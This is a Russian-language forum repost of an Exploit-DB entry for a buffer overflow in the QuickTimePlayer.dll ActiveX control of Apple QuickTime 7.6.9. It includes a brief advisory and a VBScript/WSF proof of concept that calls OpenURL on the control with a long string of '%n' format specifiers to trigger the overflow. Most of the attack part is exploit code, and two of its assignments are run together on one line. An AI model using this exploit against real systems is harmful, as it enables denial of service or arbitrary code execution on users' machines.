Exploit Apple QuickTime 7.6.9 - 'QuickTimePlayer.dll' ActiveX Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36115
Проверка EDB
  1. Пройдено
Автор
IVAN SANCHEZ
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2011-09-06
Код:
source: https://www.securityfocus.com/bid/49465/info

Apple QuickTime is prone to a buffer-overflow vulnerability because of a failure to properly bounds-check user-supplied data.

Successful exploits will allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions.

QuickTime 7.6.9 is vulnerable; other versions may also be affected. 

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:0F5B08E7-94EE-470B-A184-5CD4A7DF35A3' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\QuickTime\QuickTimePlayer.dll"
prototype  = "Sub OpenURL ( ByVal url As String )"
memberName = "OpenURL"progid     = "QuickTimePlayerLib.QuickTimePlayer"
argCount   = 1
arg1="%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
target.OpenURL arg1
</script>
</job>
</package>
 
Источник
www.exploit-db.com

Похожие темы